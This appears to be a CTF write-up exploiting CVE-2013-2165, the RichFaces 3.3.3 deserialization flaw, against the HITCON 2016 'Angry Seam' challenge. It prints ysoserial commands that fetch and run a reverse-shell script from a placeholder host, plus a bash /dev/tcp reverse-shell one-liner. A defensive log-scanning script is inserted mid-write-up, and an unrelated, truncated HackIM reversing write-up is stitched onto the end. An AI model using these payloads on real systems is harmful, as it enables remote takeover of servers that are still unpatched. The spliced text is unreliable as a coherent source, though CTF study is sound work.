Web500 HITCON CTF 2016 and exploiting CVE-2013-2165

*** Problem: Angry Seam ***
Description
Why my teammate, Sean, is so angry?
http://52.198.197.227:8080/angryseam/
Hint
None

*** Solution: ***

1. Website reconnaissance

This website has the following functions: register, login, change profile, report URL, logout. Creating a user and testing the website's functions is the first step I take.
[image: homepage]

I use Burp Suite Free for proxying and mapping the website.
This is the result:
[image: burpsuite_mapping]

Based on the URL extension (.seam) and the problem description, this website seems to use the JBoss Seam framework (http://seamframework.org). The response header "Server: Apache-Coyote/1.1" means the server runs Apache Tomcat (it might not be running the JBoss application server). The application context is angryseam, so the deployed application is most likely angryseam.war.
This website has an interesting request: http://52.198.197.227:8080/angryseam/css.seam?location=user.css&cid=15318. Changing the location parameter to another value makes the server return an HTTP 500 exception. This error tells us the server runs Apache Tomcat 7.0.52 and the application uses JSF (.xhtml) for its UI templates. The error shows some packages of the JBoss Seam framework, org.jboss.seam.* and org.jboss.seam.example.jpa.*, and a strange package I do not know: org.ajax4jsf.webapp.*. I test some path traversal payloads hoping to get the application source code, but I could not get any interesting files from the server: angryseam.war, WEB-INF/web.xml, css.xhtml, ...

[image: jboss_exception]

I continue exploring the website. The next function I pay attention to is report.seam. We can enter a URL and submit it to report it to the admin. I think of an XSS vulnerability and try some XSS payloads, still without success.

I google the package org.ajax4jsf.webapp.*. This package belongs to the RichFaces library (http://richfaces.jboss.org). This library makes programming Ajax-based web applications easier. It is usually combined with the JBoss Seam framework, JSF and Hibernate to form a technology stack for developing enterprise Java web applications. Moreover, the RichFaces version used by this website is 3.3.3.Final (look again at the second image). Until then, I mostly understood the technologies the author used to build the website. But how did the author code it? Reading the HTML generated for some pages (login.seam, register.seam), I see some keywords: User Name, Real Name, Password, Verify Password, verifyDecorate, passwordDecorate, ... Additionally, the package name org.jboss.seam.example.jpa.* gives us a hint. The author seems to have used an example application of JBoss Seam to build this website. So I download some versions of JBoss Seam (jboss-seam-2.3.1.Final, ...) and verify my thinking. I find that JBoss Seam 2.2.1.Final is exactly the version the website uses. JBoss Seam 2.2.1.Final has an example application named "jpa"; it also has the functions register, login and logout with the same keywords (User Name, Real Name, verifyDecorate, ...), and it also uses RichFaces 3.3.3.Final :)))))

[image: jpa_example]

Next, I google all the well-known vulnerabilities of the technologies the website uses: JBoss Seam 2.2.1, RichFaces 3.3.3.Final, Tomcat 7.0.52, Hibernate 3, ...
I find an interesting vulnerability in JBoss Seam and RichFaces:

CVE-2013-2165 is a Java deserialization vulnerability. Deserialization is a well-known class of vulnerability discovered in many applications recently. So I decide to try to exploit this bug. The chance of success is not high, and I am not sure this is the intended solution for this CTF challenge, but it is worth exploring.
In the past I have had some experience with Java frameworks such as Struts, Spring, Hibernate, ... Therefore, first I will set up a debug environment for the "jpa" example application of JBoss Seam 2.2.1.Final.

2. Environment setup

My Environment:
– Windows x64
– Java JDK 8u101 x86 (the newest at the time, downloaded from the Oracle homepage)
– Eclipse J2EE Kepler
– Apache Tomcat 7.0.52 (downloaded from the Apache Tomcat homepage) to run the app.
– Maven 3 (embedded in Eclipse) for compiling and packaging the app.
– "jpa" example application (uses JBoss Seam 2.2.1.Final, JSF 1.2, RichFaces 3.3.3.Final, HSQLDB, Hibernate 3, log4j, ...)
I will not talk much about this part because it relates mostly to Java web development, and it is a long process. Anyone who wants to build this example application should read the JBoss documentation, learn some technologies (servlet, JSP, JSF, Hibernate, logging, ...) and some tools such as Maven (very important: it supports downloading sources and deep debugging inside the core framework) and Eclipse.
I recommend this site for learning Java frameworks: http://mkyong.com
After some hours of fixing bugs, I have this example application running :)

[image: run_jpa_example]

3. Exploiting CVE-2013-2165

The information about this CVE is short and hard to understand. The vulnerability is in the ResourceBuilderImpl class. Searching for this class, I find it in richfaces-impl-3.3.3.Final.jar as org.ajax4jsf.resource.ResourceBuilderImpl. Since I use Maven to build the project, I can easily view the source code of this class. It seems to handle resource management (JS, CSS, images, ...) for the website. I can set some breakpoints in this class and run the project in debug mode in Eclipse. But how does a client request get routed to this class for resource handling?

[image: resourcebuilderimpl_debug]

I check some normal requests of the website and find these URIs in both the example application and the angryseam application:
http://52.198.197.227:8080/angryseam/a4j/g/3_3_3.Finalorg.ajax4jsf.javascript.AjaxScript
http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js

Look at the prefix "/a4j". Resource requests for RichFaces use the URI prefix "/a4j", which means any request whose URI starts with "/a4j" is handled by RichFaces. When I request this URL in debug mode, a breakpoint in ResourceBuilderImpl is hit. Great. After some hours of debugging and source code reading, I mostly understand the request handling flow as follows:
1. The browser requests the URL: http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxxxxxxxxxxxxxxx
2. Tomcat handles the request, detects the prefix "/a4j" and routes the request to RichFaces.
3. RichFaces handles the request with the input "g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxxxxxxxxxxxxxxx":
– RichFaces uses ResourceBuilderImpl to parse the input and get the resource.
– RichFaces ignores the string "g/3_3_3.Final" (this constant depends on the RichFaces version).
– RichFaces gets the resource path org/richfaces/renderkit/html/scripts/skinning.js.
– RichFaces gets additional data from "DATA/xxxxxxxxxxxxxxxxxxxxxx" and extracts the raw data value: xxxxxxxxxxxxxxxxxxxxxx
– RichFaces decompresses the data value (xxxxxxxxxxxxxxxxxxxxxx) and deserializes it ← EXPLOIT
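A defender-side check for the flow above, added here as an example and not code from the original post or from RichFaces: it scans Tomcat access-log lines for "/a4j/" requests that carry a "/DATA/" segment and tries to decode that segment the way ResourceBuilderImpl would, under the assumption that the value is base64 (URL-safe or standard) over a zlib/Deflate stream, then checks for the Java serialization magic bytes and for strings that appear in the serialized form of the CommonsCollections gadget chains. The log lines and the blobs inside them are constructed samples, not real captures or real gadget chains.

```python
"""Spot RichFaces 3.x "/a4j/.../DATA/<value>" requests in Tomcat access logs.

Added example for this writeup; not code from the original post or from RichFaces.
Assumptions: the DATA value is URL-safe (or standard) base64 of a zlib/Deflate
stream, and after inflating it is fed straight into ObjectInputStream. The
access-log lines and serialized blobs below are constructed samples.
"""
import base64
import binascii
import re
import zlib

# First four bytes of every Java serialization stream (STREAM_MAGIC + STREAM_VERSION).
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"

# Substrings present in the serialized form of the ysoserial CommonsCollections
# chains used in the writeup (InvokerTransformer, the "getRuntime" method name).
# Starting list only; extend with whatever gadget libraries are on the classpath.
GADGET_INDICATORS = [
    b"org.apache.commons.collections.functors.InvokerTransformer",
    b"getRuntime",
]

# Request line inside a Tomcat common/combined access-log entry.
REQUEST_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"'
)
DATA_MARKER = "/DATA/"


def decode_data_part(data: str):
    """Undo the assumed encoding (base64 -> inflate); None if it does not decode."""
    padded = data + "=" * (-len(data) % 4)          # padding is usually stripped in URLs
    for decoder in (base64.urlsafe_b64decode, base64.b64decode):
        try:
            return zlib.decompress(decoder(padded))
        except (binascii.Error, ValueError, zlib.error):
            continue
    return None


def classify_uri(uri: str) -> str:
    """Label one request path by how far its DATA part gets toward ObjectInputStream."""
    path = uri.split("?", 1)[0]
    if "/a4j/" not in path:
        return "not-a4j"
    idx = path.find(DATA_MARKER)
    if idx == -1:
        return "a4j-resource"             # plain resource, nothing reaches deserialization
    payload = decode_data_part(path[idx + len(DATA_MARKER):].strip("/"))
    if payload is None:
        return "a4j-data-undecodable"     # malformed DATA part; still worth a look
    if not payload.startswith(JAVA_STREAM_MAGIC):
        return "a4j-data-not-serialized"
    if any(ind in payload for ind in GADGET_INDICATORS):
        return "a4j-data-gadget-indicator"
    return "a4j-data-serialized"          # reaches ObjectInputStream on an unpatched server


def scan_log(lines):
    """Return (verdict, client_ip, uri) for every parseable request line."""
    findings = []
    for line in lines:
        m = REQUEST_LINE_RE.match(line)
        if m:
            findings.append((classify_uri(m.group("uri")), m.group("ip"), m.group("uri")))
    return findings


def _encode_data_part(payload: bytes) -> str:
    """Inverse of decode_data_part; used only to build the constructed samples below."""
    return base64.urlsafe_b64encode(zlib.compress(payload)).decode("ascii").rstrip("=")


# Constructed blobs: they start with the Java stream magic but are not real object streams.
_BENIGN_BLOB = JAVA_STREAM_MAGIC + b"constructed-placeholder-resource-data"
_GADGET_BLOB = JAVA_STREAM_MAGIC + b"sr" + b"org.apache.commons.collections.functors.InvokerTransformer"

SKINNING_JS = "/angryseam/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js"

SAMPLE_LOG = [  # constructed Tomcat access-log lines
    '10.0.0.5 - - [10/Oct/2016:10:01:02 +0000] "GET /angryseam/login.seam HTTP/1.1" 200 2201',
    f'10.0.0.5 - - [10/Oct/2016:10:01:03 +0000] "GET {SKINNING_JS} HTTP/1.1" 200 4123',
    f'10.0.0.9 - - [10/Oct/2016:10:01:05 +0000] "GET {SKINNING_JS}/DATA/{_encode_data_part(_BENIGN_BLOB)} HTTP/1.1" 200 4123',
    f'10.0.0.9 - - [10/Oct/2016:10:01:06 +0000] "GET {SKINNING_JS}/DATA/{_encode_data_part(_GADGET_BLOB)} HTTP/1.1" 500 1834',
    f'10.0.0.9 - - [10/Oct/2016:10:01:07 +0000] "GET {SKINNING_JS}/DATA/zzzz HTTP/1.1" 500 1834',
]

if __name__ == "__main__":
    for verdict, ip, uri in scan_log(SAMPLE_LOG):
        print(f"{verdict:28s} {ip:10s} {uri[:80]}")
```

Any "a4j-data-*" verdict from an external client deserves attention on a RichFaces 3.3.3 deployment, because every such DATA value is attacker-controlled input to ObjectInputStream; the gadget-indicator verdict is simply the cheapest way to prioritise. The real fix is the patched RichFaces release (or removing the vulnerable resource servlet), since signature matching on a serialized stream can be evaded.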

[image: deserialize_data_in_uri]

I control the request URI, so I also control the DATA part, which is the input for deserialization in ResourceBuilderImpl. I use ysoserial for generating payloads (https://github.com/frohoff/ysoserial).
Some payloads for creating a reverse shell:
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "/usr/bin/wget -O /tmp/reverseshell http://x.x.x.x/reverseshell" > payload.bin
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "/bin/bash /tmp/reverseshell" > payload.bin
reverseshell: /bin/bash -c '/bin/bash -i >/dev/tcp/x.x.x.x 2>&1'

Source code for creating the DATA part from the payloads:

[image: gen_payload_and_data_part]

Some results I get on the server after the reverse shell succeeds:
Flag: hitcon{d0 you really g3t th1s fl4g by CSS RPO?}
File angryseam.war retrieved from the server: angryseam.war
(I think the author's intended solution is an RPO attack.)

P/S: I check the Tomcat and MySQL packages on the server because they recently had privilege escalation (get root) vulnerabilities. But the versions on the server are kept up to date and are not vulnerable.
[image: tomcat_package]
[image: mysql_package]

FINISH. THANKS FOR READING.

HackIM 2016 – donfos_reversing

It has been a long time since I last played CTF. Going forward I plan to play a lot, but only reversing, because I feel it is the area of knowledge I need to master.

In the recent HackIM I sat working on the reversing problems with my younger teammate; the two of us spent a whole day and finally solved this donfos problem. The approach for the last part is a bit hacky, but never mind, getting the flag is good enough.

Problem: re500 donfos_reversing

https://github.com/ctfs/write-ups-2016/tree/master/nullcon-hackim-2016/re/donfos-500

First, I downloaded the file and dropped it into Ubuntu to try running it; it is a 64-bit ELF. When run, it asks for a key; entering random input gives no flag. Like the re300 problem, I ran strings on it and learned that it also uses O-LLVM to obfuscate the code. Then I loaded it into IDA to read the code statically first. But the main function of this problem looks far too complicated; there was no way to sit and read the pseudocode and assembly. I guess the original function was already complex, and on top of that O-LLVM was used for obfuscation, which is why it looks like this.